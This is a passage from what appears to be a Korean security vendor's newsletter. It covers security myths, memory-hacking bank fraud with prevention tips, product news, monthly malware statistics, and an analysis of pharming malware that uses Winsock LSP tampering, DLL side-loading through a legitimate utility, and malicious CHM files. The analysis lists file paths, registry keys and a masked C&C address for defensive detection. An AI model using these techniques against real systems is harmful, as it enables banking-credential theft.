쉽게 한다거나 도형의 숨겨진 부분을 잘 파악한다거나 하는 능력을
의미한다. 즉, 지능 지수는 사람이 가지고 있는 사고의 체계를 구성하
고 있는 요소를 각각 평가하는 지표라는 의미이며, 지능이 높다고 창
의적이라는 의미는 아니다.
아르키메데스가 목욕통 속에 앉아 있다가 물이 넘치는 것을 보고 ‘비중’
이라는 것을 깨닫고 뛰쳐나오며 ‘유레카!’라고 외쳤다는 이야기는 잘 알
려져 있다. 그렇다면 창의력, 창의적인 사고는 어디에서 오는 것일까?
인간은 학습이나 독서 등을 통하여 습득하는 지식, 그리고 살면서 겪
는 다양한 직·간접적인 경험, 어떤 문제를 풀고 해결한 결과들을 모
아 하나의 개인적인 체계를 갖게 된다. 이러한 체계에 새로운 지식과
경험이 추가되면서 계속 성장해 나가게 되는 것이다. 또한 어떤 임계
점을 넘어서게 되면 비로소 새로운 아이디어로 연결되고, 창의적인 사
고로 발전하게 된다. 즉, 인간의 지능은 논리와 사고력을 중심으로 성
장할 것이고, 여기에 지식과 경험이 누적되면 창의력이라는 새로운 눈
을 뜨게 될 것이다. 이런 학습된 경험을 제공하는 방법으로 소프트웨
어는 매우 유용한 도구가 될 수 있다.
소프트웨어와 문제 해결 능력
소프트웨어를 통한 학습은 문제를 파악하고 상황을 다양하게 풀어내
는 능력을 키우는 좋은 방법이다. 소프트웨어는 문제 해결에 있어서
논리적인 흐름을 따르게 되는데, 흔히 알고리즘이라고 하는 논리의 연
속적인 연산 작용을 이용하게 된다. 해결해야 할 문제를 작은 문제들
로 나누고, 각각 해결할 수 있는 답을 작성하고, 작은 문제들이 연결되
어 원래의 큰 문제를 해결할 수 있도록 맞추어 나가다 보면 결국 처음
의 문제를 해결할 수 있게 되는 것이다. 이러한 단계를 거치기 위해서
는 문제를 작게 나누고 연결할 수 있는 논리적인 사고와 작은 문제들
을 다른 방향에서 바라보면서 해결할 수 있는 창의적인 사고가 필요
하다.
소프트웨어는 하드웨어와 달리 프로그래밍 언어로 수정이 가능하도록
유연하게 구성되어 있고, 수정된 코드는 업데이트가 가능하다. 프로그
래밍을 시작할 때 처음 배우는 “Hello PC World”를 출력하는 코드는
사실 몇 줄만으로 가능하다. 하지만 작성하는 언어에 따라, 프로그래
머에 따라 다른 코드로 작성이 되며, 4~5줄에서 100여 줄까지 길이
도 천차만별로 나올 수 있다.
소프트웨어로 코딩을 하는 것은 운영체제 위에서 돌아가는 프로그램,
브라우저에서 돌아가는 프로그램, 데이터베이스를 다루는데 특화된
프로그램 등 다양한 프로그래밍 언어를 가지고 작업을 할 수 있기 때
문에, 똑같은 결과물을 보여주더라도 그것을 구현하는 프로그램은 제
작자의 논리력과 창의력에 따라 아주 다르게 나올 수밖에 없다.
결론적으로, IT 기술이 우리의 삶에 중요한 부분으로 자리잡게 되면서
소프트웨어에 대한 이해와 교육이 주목받고 있다. 교과과정을 통해서
같은 내용을 배우고 세상에 나와서 활용하던 산업화를 지나서 이제는
다양한 문제를 해결하고 창의적인 사고를 기를 수 있는 소프트웨어의
시대가 되었다. 창의적이라는 것은 지식, 경험, 습관에서 나오는 것이
며 이를 키우고 유지하기 위해서는 좋은 업무 환경과 자신의 방식으
로 습관을 만들어 가는 것이다. 특히 소프트웨어는 안정된 운영을 중
시해야 하는 하드웨어에 비해서 다양한 방법으로 문제를 해결하는 방
법을 생각할 수 있게 해주는 가장 좋은 방법이 아닌가 생각한다.
29
i T & l i f E
전문가가 전하는 보안에 대한 ‘오해와 진실’
정보기술의 발전은 평범한 개인도 정보보안에 대해 고민하게 한다. 보안 취약점, 악성코드, 해킹사고 등 보안 이슈는 개인뿐만 아니라
국가의 안전을 위협하는 요소로 발전하고 있다. 북대서양조약기구인 나토(NATO)는 사이버 공격을 전쟁의 한 종류로 규정하고 교전 수
칙을 제정하는 단계에 이르렀다. 반면 일반 사람들은 국내외 언론 및 온라인 매체들을 통해 매우 복잡하고 고도화된 사이버 공격 사례
를 많이 접해서인지 자신의 정보기기를 지키기 위해 할 수 있는 일은 거의 없다고 생각한다. 이에 일반 사용자의 정확한 이해와 피해
예방 및 보안 인식 제고를 위해 정보보안에 대한 오해와 진실을 전한다.
1. 비밀번호는 별로 중요하지 않다?
대부분 사람들은 대형 보안 사고가 발생할 때마다 자신과는 상관 없다고 생각한다. 개인적인 이익을 노리는 해커는 대부분 기관이나 기업을
대상으로 하기 때문이다. 그렇다면 개인은 표적 공격에서 자유로울까? 틀린 말은 아니지만, 꼭 그런 것만도 아니다.
일반 사용자를 대상으로 한 공격은 불특정 다수에게 무작위로 배포되는 악성코드거나 취약점 공격일 가능성이 크다. 이와 같은 공격은 일반적
으로 개인정보 탈취를 통한 금전적 이득이 목적인 만큼 강력한 비밀번호와 2단계 인증을 사용하면 예방할 수 있다. 예를 들어 평소에 사용하는
웹사이트의 계정을 ‘패스워드 매니저 툴’에 저장하고 이 툴에서 생성하는 일회용 비밀번호(OTP)를 통해 웹사이트에 로그인하는 것도 하나의
방법이다. 또한, 2단계 인증(예 : 비밀번호 + 문자메시지 인증)을 사용하여 이메일이나 SNS에 로그인하는 것도 효과적이다.
강력한 비밀번호는 대문자, 소문자, 숫자, 특수문자 조합으로 최소 8자리 이상으로 구성된 길고 복잡한 문자열로 구성하는 것이다. 귀찮다는 핑
계로 간단한 비밀번호를 사용하는 이들이 다음의 표를 본다면 왜 복잡한 비밀번호를 설정해야 하는지 이해가 빠를 것이다.
2. 새로 구입한 노트북은 안전할까?
보안 관련 오해 중에는 새로 산 기기는 안전하다고 생각하는 것도 있다. 최근 레노버사가 노트북에 ‘슈퍼피시(Superfish)’라는 애드웨어
(Adware)를 심어 판매했던 사실이 알려져 논쟁거리가 됐다. 슈퍼피시는 자체 루트(root) 인증서를 심어 사용자의 온라인 활동을 동의 없이 감
시하기 때문에 백도어(back door)로 악용될 가능성이 크다. 지난 3월 초 발견된 ‘SSL FREAK’ 취약점은 1990년대 미국 정부의 해외 수출용 암
호화 키 길이 제한에서 비롯됐고 한국을 포함한 전 세계를 떠들썩하게 했다.
결국, 새로 구매한 노트북의 안전은 내부에 설치된 소프트웨어의 보안성에 달려 있다. 윈도 OS와 같은 소프트웨어는 수백만 줄의 코드로 구성
돼 있는데 그 복잡성을 생각하면 보안 무결성을 보장하는 것은 거의 불가능하다. 개발자는 소프트웨어 전체에 단 한 개의 버그가 없도록 노력
해야겠지만 해커는 단 한 개의 취약점만 찾으면 된다. 따라서 소프트웨어는 항상 버그가 있고 그중 영향력이 큰 것은 보안에도 막대한 영향을
미친다는 점을 염두에 둬야 한다. 또 새로 구입한 노트북이나 기기도 소프트웨어를 설치할 때 보안 패치나 백신 설치를 하면 좋다.
3. 백신 프로그램은 보안의 종결자?
많은 사람이 오해하고 있는 것 중에는 백신 프로그램을 설치하고 업데이트만 하면 보안이 해결된다고 생각한다. 물론 어느 정도 보안에 도움
이 되는 것은 사실이지만 완벽한 해결책은 아니다. 백신은 알려지지 않은 악성코드에 대한 선제 예방 솔루션이 아니라 알려진 악성코드에 대
한 대응적 방어책이기 때문이다.
일반적으로 백신은 각 보안업체에서 분석한 악성코드의 정보를 바탕으로 악성코드의 ‘블랙리스트’를 만들고, 이를 백신에 반영한다. 이를 기
반으로 백신이 설치된 PC를 스캔하고 ‘블랙리스트’에 해당하는 악성코드를 검출해내는 방식을 사용한다. 즉, 백신의 악성코드에 대한 대응은
패스워드를 깨는데 걸리는 시간 <출처: https://howsecuritymypassword.net>
30
1) 새로운 악성코드 접수 및 수집 2) 악성코드 분석 3) 악성코드 시그니처 업데이트 및 백신 엔진에 업데이트하는 단계를 거친다. 대부분 악성
코드 접수에서 엔진 반영까지 시차가 발생할 수밖에 없다. 해커는 대상으로 삼은 기업의 백신이 잡지 못하는 악성코드를 찾아내 공략하기 때
문이다. 하루 평균 15~50만 개 사이의 신·변종 악성코드가 만들어지고 있어 백신 업체는 매일 악성코드와의 전쟁을 치르고 있다고 해도 과언이
아니다.
많은 보안 전문가의 조언처럼 최악을 피하는 차선책은 백신 프로그램을 설치하고 최신 엔진으로 유지하는 것이다. 이는 보안의 기본이면서도
가장 중요한 예방책이다.
4. 그러면 백신은 아무 소용 없다?
이러다 보니, 일각에서는 지능형 위협 공격(APT)에 대해 백신이 소용없다고 생각하는 경우가 많다. 하지만 이는 대단히 위험한 발상이다. 백신
은 이미 알려진 보안 위협에 대한 기본적인 방어책이다. 백신이 없다면 인터넷에서 쉽게 구할 수 있는 매우 낮은 단계의 해킹 툴 등에도 개인
의 PC나 조직의 방어막이 쉽게 뚫릴 수 있기 때문이다.
또한, 3·20 사태와 같이 최근의 APT 공격은 기업 및 조직의 서버나 네트워크에 직접 침투하는 것이 아니라 개인 PC에 먼저 침투하고, 내부 중
요 IT 인프라에 침입하는 방식이 주를 이루고 있다. 이러한 경향에 기반을 둬 많은 전문가는 최초 감염단계를 APT 공격에서는 매우 중요하게
생각한다. 따라서 백신은 소용 없는 것이 아니라 백신만으로는 부족하다는 의미로 이해해야 한다.
위에서 언급했던 것처럼 백신이 보안을 100% 완벽하게 해결해 주진 못하지만, 기본 방어막은 될 수 있다. 따라서 사용자는 항상 백신을 최신
엔진으로 유지하고 사용 중인 소프트웨어의 보안 패치도 새롭게 추가될 때마다 적용해야 적어도 알려진 악성코드에 대해서는 안전하다.
<참고 사이트>
http://gizmodo.com
31
i T & l i f E
메모리 해킹 수법과 예방법
피싱, 파밍, 스미싱은 많은 매체를 통해 특징이나 피해 사례에 대해 잘 알려졌지만 메모리 해킹(Memory Hacking)은 피해 사례가 많
지 않아 여전히 생소한 개념이다. 메모리 해킹은 사용자 PC의 메모리에 있는 금융 정보를 탈취하여 정상적인 인터넷 뱅킹 과정을 거치
더라도 중간에서 이체 계좌나 송금 금액을 임의로 변경하는 방식으로, 피해자는 피해 사실을 인지하기 어렵다. 메모리 해킹은 파밍보
다 더 교묘해 인터넷 뱅킹 사용자 입장에서는 위험한 전자 사기로 인식되고 있다. 메모리 해킹 사례를 통해 예방법을 알아봤다.
직장인 어안이 씨는 평소와 다름 없이 인터넷 뱅킹을 위해 거래 은행 사이트에 접속했고, 접속 후 공인인증서로 로그인했다. 로그인 후 계좌이
체를 위해 이체비밀 번호를 입력하고 보안카드 번호 앞뒤 2자리를 입력했다. 이제 공인인증서의 비밀번호만 입력하면 거래가 완료되는 찰나에
갑자기 PC가 다운됐다. 공인인증서 비밀번호를 입력하지 않아서 거래가 처리되지 않았을 것으로 생각한 어안이 씨. 귀찮지만 PC를 재부팅하
고 인터넷 뱅킹을 다시 시도해야겠다고 생각하던 차에 휴대전화로 ‘200만 원 출금’이라는 문자메시지가 도착했다. 말로만 듣던 신종 전자 금융
사기의 피해자가 된 것이다.
위의 사례와 같이 메모리 해킹은 주로 인터넷 뱅킹 과정에서 발생한다. 메모리 해킹이란 컴퓨터에 저장돼 있던 계좌번호나 보안카드 일부 번
호 등을 알아낸 뒤 돈을 빼돌리는 신종 수법이다. 경찰청에 따르면 메모리 해킹에는 주로 두 가지 수법이 이용되고 있다. 피해자의 PC가 악성
코드에 감염된 후 정상적인 인터넷 뱅킹에서 보안카드 번호 앞뒤 2자리를 입력한 후 이체를 실행시키면 오류가 반복되며, 이체정보는 전송되
지 않는다. 그리고 일정 시간 경과 후 범죄자가 피해자의 보안카드 번호를 입력하면 범행계좌로 이체된다. 다른 수법은 피해자의 PC가 악성코
드에 감염된 후 정상적인 계좌이체를 마친 후 보안강화 알림창이 나타나면서 보안카드 번호 앞뒤 2자리 입력을 요구하며 일정 시간이 지나면
범행계좌로 이체된다.
파밍은 사용자를 가짜 은행 사이트로 유도한 후 보안 강화를 위해 정상적인 인터넷 뱅킹 거래에서 요구하는 보안카드 번호 앞뒤 2자리가 아닌,
이보다 많거나 보안카드 번호 모두를 입력하라고 요구하는 경우가 많아 사용자가 주의하면 사전에 피해를 예방할 수 있다. 하지만 메모리 해
킹은 파밍보다 수법이 교묘해 피해 예방이 어렵다. 정상 은행 사이트에서 인터넷 뱅킹 절차인 보안카드 번호 앞뒤 2자리를 입력한 후 거래를
완료하는 시점에서 금융 사기가 발생하기 때문에 별다른 징후 발견이 어렵기 때문이다.
이처럼 메모리 해킹이 스미싱, 피싱, 파밍 보다 위험한 이유는 피해자가 인지할 때는 이미 계좌에서 현금이 출금된 후여서 손을 쓰기 어렵기 때
문이다. 아직 피해 사례가 많지 않지만 추후 발생 가능성이 클 것으로 예상하는 만큼 주의가 필요하다.
백신 사용과 악성코드 검사는 필수
스미싱, 피싱, 파밍은 사용자가 주의하면 예방할 수 있지만, 메모리 해킹은 피해 사실을 뒤늦게 인지하기 때문에 사전에 알아둘 필요가 있다.
무엇보다 악성코드 감염으로 전자 금융 사기가 진행되는 만큼 악성코드의 유입을 차단할 필요가 있다. 이를 위해서는 백신 프로그램을 항상
최신 버전으로 유지하는 것이 좋다. 또 금전이 거래되는 만큼 인터넷 뱅킹 사이트에 보안 프로그램이 작동하는지 살펴본 후 금융 거래를 하는
것이 좀더 안전하다.
특히 안전한 거래를 위해 일회용 비밀번호 생성기(OTP)나 비밀번호의 복사를 방지하는 보안토큰 사용이 권장된다. 또 공인인증서나 보안카드,
비밀번호는 PC나 이메일에 저장하지 말고 저장돼 있다면 바로 삭제해야 한다. 앞서 소개한 방법은 일반적인 금융 거래 시 유의 사항이지만 금
융 사기 사건이 계속 발생하고 있는 만큼 개인의 주요 자산을 지키기 위해서는 꼭 지켜야 할 안전한 전자 금융 거래를 위한 수칙이다.
32
<안전한 전자 금융 거래를 위한 사용자 보안 수칙>
• OTP(일회성 비밀번호생성기), 보안토큰(비밀정보 복사방지) 사용
• PC·이메일 등에 공인인증서, 보안카드 사진, 비밀번호 저장 금지
• 윈도, 백신프로그램을 최신 버전으로 유지하고 실시간 감시상태 유지
• 전자금융사기 예방 서비스(공인인증서 PC 지정 등) 적극 가입
• 출처 불명한 파일이나 이메일은 열람하지 말고 즉시 삭제
• 영화·음란물 등 무료 다운로드 사이트 이용 자제
피해를 입었다면 즉시 신고
어안이 씨와 같이 금전 피해를 당한 경우라면 거래 은행이나 금융기관의 콜센터로 피해 사실을 알리고, 공인인증서와 보안카드는 즉시 폐기해
야 한다. 피해 구제를 받으려면 전자금융거래 배상책임보험에 따라 보험사에 사고를 접수하고, 보상받지 못한 경우 피해자가 별도로 소송을 진
행해야 한다. 2013년 11월 23일부터 시행 중인 전자금융거래법 개정안에 따르면 해킹사고가 발생하면 일차적인 책임은 은행에 있지만 은행이
피해자의 고의성이나 중과실을 입증하지 못하면 보상을 받을 수 있다. 하지만 보상을 받기란 쉽지 않으므로, 사전 예방이 중요하다.
< 자료: 사이버 경찰청 >
3333
a h N l a b N E w S
안랩의 설문 조사 결과, 국내 기업의 지능형 위협 대응에 대한 필요
성과 인식은 높지만, 솔루션 도입 등 실행은 미흡한 것으로 나타났다.
안랩은 한국 IDG와 공동으로 지난 2월 26일부터 3월 27일까지 국
내 IT 기업과 금융, 서비스업 등 다양한 산업군의 IT/비IT 담당자
444명을 대상으로 ‘지능형 위협(이하 APT, Advanced Persistent
Threat) 대응 솔루션 도입’에 대한 설문 조사를 했다.
먼저, APT 대응 솔루션 도입 검토 시 신종 위협을 탐지한 이후 ‘대응’
기능의 구현 위치에 대한 질문에는 ‘네트워크 영역과 PC와 같은 엔
드포인트 영역에서 각각’이라고 응답한 비율이 절반 이상(53.7%)을
차지, ‘엔드포인트 대응(28.6%)’, ‘네트워크 영역 대응(11%)’의 응답
을 훨씬 웃돌았다.
이는 현재 많은 APT 대응 솔루션이 네트워크 영역의 샌드박스
(sandbox) 기술을 제공하고 있지만, 실질적인 ‘대응’을 위해서는 ‘네
트워크 레벨’뿐만 아니라 실제 감염이 발생하는 PC 등의 ‘엔드포인
트 영역’까지 ‘광범위한 대응’의 필요성을 현업의 실무자들이 인식하
고 있다는 것을 의미한다.
또한, APT 대응 솔루션의 엔드포인트 영역에서 ‘대응’을 위해 필요한
기능을 묻는 말에는 응답자의 33.5%가 ‘의심 파일 ‘선 차단’ 후 악성
판정 시 조치’라고 답해, 기업의 ‘엔드포인트 영역’에서 최초 감염 방
지를 중요하게 생각하는 것으로 파악됐다. 뒤를 이어, ‘의심 파일을
내려받은 시스템에 대한 침해사고 분석(27.4%)’과 ‘탐지된 신종 악
성코드에 대한 신속한 조치(27%)’ 등이 비슷한 비율로 조사됐다.
하지만 전체 응답자의 68.3%가 해당 기업에서 ‘APT 대응 솔루션
을 운영하지 않고 있다’고 답변, 아직 많은 기업에서 지능형 위협 방
어 실행이 제대로 이루어지지 않은 것으로 나타났다. 운영 중이라
고 답한 응답자 중에서는 인터넷 웹 영역에서 운영 중이라는 답변
이 15%, 이메일 영역과 망분리/망연계 구간에서 운영한다는 응답이
6.6%, 파일서버 구간에서 운영한다는 답변이 3.6%로 나타났다(중복
응답).
윤상인 안랩 제품기획팀 부장은 “이번 설문에서 기업은 ‘지능형 위
협’에 빠른 탐지가 최선이며, 최초 피해자(patient zero)의 발생 방지
를 중요하게 생각하고 있는 것으로 나타났다”며, “현재 다양한 APT
솔루션이 있으므로, 각 기업의 IT 환경과 도입 목적에 맞게 ‘탐지와
대응’이 조화를 이룬 솔루션을 선택해 지능형 보안 위협 피해를 최소
화해야 한다”라고 말했다.
위기반 진단’과 ‘평판기반 진단’ 등을 제공하는 다차원 분석 플랫폼
을 탑재해 높은 악성코드 대응력을 제공한다. 또한, 엔진 크기와 검
사 시 PC의 시스템 부담을 대폭 감소시키고, 검사속도는 빨라졌다.
‘V3 IS 9.0’은 자사의 기존 제품인 ‘V3 IS 8.0’이 한층 업그레이드된
제품이다.
한창규 안랩 시큐리티대응센터(ASEC) 실장은 “안랩은 개인/기업 고
객이 보안 위협으로부터 보호받고 안전한 사이버 환경을 누릴 수 있
도록 앞으로도 최고의 제품을 제공하기 위해 끊임없이 노력하겠다”
고 말했다.
한편, 안랩은 2014년 9월부터 최신 제품인 V3 IS 9.0으로 AV-TEST
에 참가해 꾸준히 인증 획득을 이어오고 있다. 또한, 모바일 보안 제
품인 V3모바일도 AV-TEST에 2013년 1월 첫 테스트에 참가한 이후
3년 연속 최고 성적으로 인증을 획득하고 있다.
‘지능형 보안 위협 대응 필요하나
도입은 미진’
안랩 V3, AV-TEST 글로벌 인증 획득
안랩의 기업용 PC 통합보안 제품인 ‘V3 Internet Security 9.0(이하
V3 IS 9.0)’이 글로벌 보안제품 성능평가 기관인 AV-TEST(www.av-
test.org)가 1, 2월 실시한 테스트에서 인증 기준을 충족해 AV-TEST
인증을 획득했다.
2015년 첫 평가인 이번 테스트는 전 세계 주요 업체의 26개 보안
솔루션을 대상으로 윈도 8.1 환경에서 진행됐다. ‘V3 IS 9.0’은 진단율
(Protection), 성능(Performance), 오진 및 사용 편의성(Usability)
의 3가지 영역에서 인증 기준을 충족해 인증을 획득했다.
특히, 진단율 부문에서 실제 환경에 가까운 ‘리얼월드(real-world)
테스트’에서는 평균 95%, 기관이 선택한 대표 샘플 기반 테스트인
‘프리밸런트(prevalent) 테스트’에서는 평균 100%의 진단율을 기록
했다.
안랩의 ‘V3 IS 9.0’은 안랩의 클라우드 기술인 ‘안랩 스마트 디펜스
(AhnLab Smart Defense)’ 기반의 강력한 악성코드 탐지 기능과 ‘행
34
보안 통계와 이슈 S T a T i S T i C S
2월에 이어 3월 악성코드도 PUP가 강세
ASEC이 집계한 바에 따르면 2015년 3월 한 달간 탐지된 악성코드
수는 2,131만 7,813건이다. 이는 전월 2,206만 3,090건보다 74만
5,277건 감소한 수치다. 한편 3월에 수집된 악성코드 샘플 수는 421
만 7,293건이다.
[그림 1]에서 ‘탐지 건수’란 고객이 사용 중인 V3 등 안랩의 제품이 탐
지한 악성코드의 수를 의미하며, ‘샘플 수집 수’는 안랩이 자체적으로
수집한 전체 악성코드의 샘플 수를 의미한다.
[그림 2]는 2015년 3월 한 달간 유포된 악성코드를 주요 유형별로 집
계한 결과이다. 불필요한 프로그램인 PUP(Potentially Unwanted
Program)가 50.45%로 가장 높은 비중을 차지했고, 트로이목마
(Trojan) 계열의 악성코드가 28.03%, 애드웨어(Adware)가 6.85%로
그 뒤를 이었다.
2015년 3월 악성코드 유포지로 악용된 도메인은 1,563개, URL은
3만 3,588개로 집계됐다. 또한, 3월의 악성 도메인 및 URL 차단 건
수는 총 535만 4,893건이다. 악성 도메인 및 URL 차단 건수는 PC
등 시스템이 악성코드 유포지로 악용된 웹사이트의 접속을 차단한
수이다.
안랩 시큐리티대응센터(ASEC)는 ASEC Report Vol.63을 통해 지난 2015년 3월의 보안 통계 및 이슈를 전했다. 3월의 주요 보안 이
슈를 살펴본다.
다시 돌아온 LSP 변조, 파밍 공격
ASEC, 3월 악성코드 통계 및 보안 이슈 발표
[그림 1] 악성코드 추이(2015년 1월 ~ 2015년 3월)
샘플 수집 수탐지 건수
[그림 2] 2015년 3월 주요 악성코드 유형
Worm DownloaderAdwareetctrojanPUP
5,000,000
6,000,000
10,000,000
20,000,000
30,000,000
40,000,000
1,000,000
2,000,000
3,000,000
4,000,000
03월02월01월
36,895,683
21,317,81322,063,090
3,54
9,66
7
3,54
9,66
7
4,21
7,29
3
6.85%
8.67%
28.03%
50.45%5.54%
0.46%
35
2015년 3월 한달 간 탐지된 모바일 악성코드는 24만 7,243건으로
집계됐다.
악성 도메인/UrL 차단 건수 악성코드 유포 UrL 수악성코드 유포 도메인 수
[그림 3] 악성코드 유포 도메인/uRl 탐지 및 차단 건수(2015년 1월 ~ 2015년 3월)
[그림 4] 모바일 악성코드 추이(2015년 1월 ~ 2015년 3월)
10,000
20,000
30,000
8,000,000
9,000,000
40,000
7,000,000
6,000,000
5,000,000
4,000,000
003월02월
33,588
19,790
1,5631,5941,917
01월
8,104,699
50,000
100,000
150,000
250,000
200,000
0
03월02월01월
247,243
221,188
108,607
5,354,8934,860,868
24,254
다시 돌아온 LSP 변조, 파밍 공격
오래전 ‘온라인게임핵’, ‘파밍’ 악성코드에 사용된 공격 방법이 최근
다시 발견되었다. 이번에 발견된 공격 방법은 LSP(Layered Service
Provider) 변조를 이용한 방식과 정상 파일을 악용한 방식이다. 두 가
지 방식에 대해 알아보자.
LSP 변조 방법
관련 악성코드를 알아보기에 앞서 LSP에 대해 알아보면 [그림 5]와
같다.
Winsock(Windows Socket API)은 윈도 운영체제 내에서 인터넷 응
용 프로그램의 입출력 요청을 처리하는 인터페이스이다. 웹 브라우저
와 같은 응용 프로그램의 명령을 받아 ‘Winsock 2 DLL’을 거쳐 최종
적으로 ‘Base Provider’와 통신한다.
이러한 통신 과정의 LSP는 모든 데이터를 여과 없이 통과하기 때문
에 송수신되는 데이터를 모두 감시할 수 있다. LSP를 함부로 삭제할
경우 네트워크가 정상적으로 동작하지 않으며 레지스트리에 등록되
어 설치되므로 LSP 변조 여부를 인지하기 어렵다.
이번에 발견된 악성코드는 기존의 공격 방법인 ‘LSP 변조’와 ‘VPN 터
널링’ 기법을 사용했다. 악성코드에 감염되면 [표 1]과 같이 파일을
생성한다.
생성된 파일은 [표 2]와 같이 레지스트리에 등록되어 시스템 시작 시
자동으로 실행된다.
[그림 5] Winsock 2 & Winsock 2 Transport SPI 구조
[그림 6] LSP(Layered Service Provider) 구조
[표 1] 생성되는 파일 경로
[표 2] 레지스트리 등록
[생성 파일]
C:\WINDOWs\system32\v2BSXerv.dll
C:\WINDOWs\system32\twlsp.dll
[레지스트리 경로]
HKLM\SYSTEM\ControlSet001\Services\BSXerv\DisplayName
→ “BS Server”
HKLM\SYSTEM\ControlSet001\Services\BSXerv\ImagePath
→ “%SystemRoot%\system32\svchost -k BSXerv”
HKLM\SYSTEM\ControlSet001\Services\BSXerv\Parameters\ServiceDll
→ “C:\WINDOWS\system32\v2BSXerv.dll”
36
VPN에 연결되면 악성코드는 감염된 시스템에서 주요 포털과 은행 사
이트에 연결을 시도하는 것을 감시한다. 사용자가 사이트에 접속을 시
정상 파일이 악성코드 실행에 이용된 것은 이번이 처음은 아니다.
2014년에도 국내에서 잘 알려진 프로그램의 정상 파일도 악성코드
실행에 사용되었으며 이번에 발견된 악성코드는 마우스로 볼륨을 조
절하는 유틸리티인 ‘볼류마우스(Volumouse Utility)’를 통해 실행한다.
이후 시스템의 LSP를 변조한다. 악성코드는 시스템에 저장된 LSP 프
로토콜 정보 목록을 모두 삭제한 후 ‘twlsp.dll’ 파일을 추가한다([그
림 7]). 이후 기존에 저장된 LSP 프로토콜 정보를 복원시킨다.
도하면 감염된 악성코드에 의해 파밍 사이트로 연결된다.
정상 파일(UTIL)을 악용한 파밍 공격
주말을 이용해 다수의 국내 사이트가 파밍 악성코드 유포에 악용된
정황이 확인되었다. 사이트 대다수는 최종적으로 같은 악성 파일을 내
려받도록 조작되어 있었다.
악성코드 유포 방법은 ‘카이홍 갓모드(Caihong, God Mode)’를 이용
한 악성코드 유포 방식과 유사하다. 공격자는 취약한 사이트에 아이
프레임(iframe)을 삽입하고 경유지를 거쳐 최종적으로 파밍 악성코드
를 내려받도록 유도한다.
악성코드는 사용자가 감염 여부를 인지하지 못하도록 자가 삭제된다.
그리고 svchost.exe를 통해 실행된 ‘v2BSXerv.dll’파일에 의해 VPN
정보를 수신하여 연결을 시도한다.
삽입된 스크립트들은 분석이 어렵게 난독화되어 있다. 일반 사용자들
은 스크립트 동작이 눈에 보이지 않기 때문에 악성코드에 감염된 사
실을 인지하기 어렵다. 이번에 발견된 파밍 악성코드는 악성코드를
실행시키는 과정에서 정상 유틸리티 파일을 이용했다.[그림 8] 실행 중인 ‘v2BSXerv.dll’ 파일
[그림 9] VPN 정보 수신
[그림 12] 정상/악성 DLL 비교
[그림 10] VPN 정보 수신
[그림 7] 추가된 ‘twlsp.dll’ 파일
[그림 11] 악성코드 유포 과정
[표 3] 변조된 LSP 경로
[변조된 LSP 경로]
HKLM\SYSTEM\ControlSet001\Services\WinSock2\Parameters\
Protocol_Catalog9\Catalog_Entries\[숫자]\PackedCatalogItem
→ 43 3A 5C 57 49 4E 44 4F 57 53 5c 73 79 73 74 65 6d 33 32 5c 74 77 6c 73 70 2e …(생략)
37
[그림 13] 악성 vlmshlp.dll 로드
[그림 16] 오브젝트 태그를 이용하여 악성 파일(wuacted.exe) 실행
[그림 17] 파일 별 바이너리 문자열 비교
(왼쪽부터 2012년 5월, 2013년 4월, 2015년 3월, 2015년 3월)
[그림 15] 실행 화면
[그림 14] 변조된 svchost.exe 실행
[표 4] 랜덤으로 구성되는 각 헤더 요소들
이는 정상 파일이 DLL을 로드하는 과정에서 DLL을 검증하지 않는 설
계상의 문제점을 이용한 것이다. Volumouse.exe는 위치 기반으로
vlmshlp.dll을 로드하여 실행하는데, DLL을 로드하는 과정에서 로드
될 파일의 사실 여부를 검증하지 않는다. 따라서 로드될 DLL과 이름
만 같다면 설계 시 의도한 파일이 아니어도 문제없이 실행된다.
[그림 14]와 같이 로드된 악성 vlmshlp.dll은 svchost.exe를 실행시
키고 메모리 변조를 통해 악성 행위를 하는 프로세스로 둔갑시킨다.
위와 같이 처음 CHM 파일을 클릭하면 바로 악성 파일이 실행되는 이
유는 index.htm에 있는 오브젝트(object) 태그를 이용하여 악성코드
를 로드하기 때문이다([그림 16]).
해당 악성코드는 여러 스레드(thread)와 이벤트로 동작한다. 각 스레
드는 C&C와의 송수신, 악성코드 다운로드, 파일을 실행한다. 특히 하
드 코딩된 값들로 HTTP 헤더(header)를 랜덤하게 구성하는 코드가
확인되었지만, 현재 C&C(www.wi****m.com, 17*.**.***. *53:3680)
가 정상으로 동작하지 않아 자세한 확인은 이루어지지 않았다.
[표 4]와 같이 랜덤으로 구성되는 HTTP 헤더의 URL은 존재하지 않는
주소로 확인된다.
이러한 형태, 행위와 C&C는 [그림 17]과 같이 과거 수집된 몇몇 CHM
악성코드에서도 확인된 바 있다.
안랩은 청첩장, 이력서를 비롯하여 ‘3.20 전용 백신’, ‘국방표준종합정
보시스템 공지’ 등으로 위장한 CHM을 소개한 바 있다. [표 5]와 같이
각 파일의 특징을 간단히 비교해보았다.
또한, 메모리 영역의 데이터만 변조했기 때문에 파일 자체는 정상 파
일이지만 실제 행위는 악성 vlmshlp.dll이 변조한 행위를 한다. 일반
사용자는 vlmshlp.dll이 악성인지 정상인지를 판단하기 어렵다.
최종적으로 변조된 svcshost.exe는 공인인증서 유출, DNS 변조, 맥
주소 유출 등을 통해 파밍 사이트로 접속을 유도하여 사용자들의 금
융 정보를 탈취한다.
정상 사이트를 침해하여 악성코드를 유포하는 방법은 접속하는 사용
자 모두가 공격 대상이다. 이러한 공격들은 특정 응용프로그램과 운
영체제의 취약점을 이용하여 사용자 모르게 악성코드를 감염시킨다.
뿐만 아니라 감염 사실을 인지하기 어려우므로 보안 업데이트나 백신
을 사용하지 않을 경우 무방비상태로 악성코드에 노출될 수 있다. 따
라서 이를 대비하기 위해 보안업데이트와 백신을 항상 최신 버전으로
유지할 것을 권장한다.
V3 제품군에서는 관련 악성코드를 다음과 같이 진단하고 있다.
<V3 제품군의 진단명>
Trojan/Win32.Kryptik (2015.03.04.00)
Trojan/Win32.Injector(2015.03.09.03)
Trojan/Win32.Banki(2015.03.10.04)
JS/Redirect(2015.03.10.02)
JS/Exploitkit(2015.03.09.02)
주요 기관 노리는 CHM 악성코드
기관을 대상으로 한 악성 CHM(Microsoft Compiled HTML Help) 파
일이 지속적으로 발견되고 있다. 특히 과거부터 발견된 몇몇 파일들이
서로 비슷한 특징을 가지고 있어 그 연관성을 확인해볼 필요가 있다.
[그림 15]와 같이 악성 파일을 실행하면 Microsoft 도움말(CHM) 파
일과 청첩장 PDF 파일임을 확인할 수 있다.
38
[표 5] 파일 비교
[표 5]와 같이 악성 파일 로드 방식이나 C&C 도메인의 유사성, 바이너
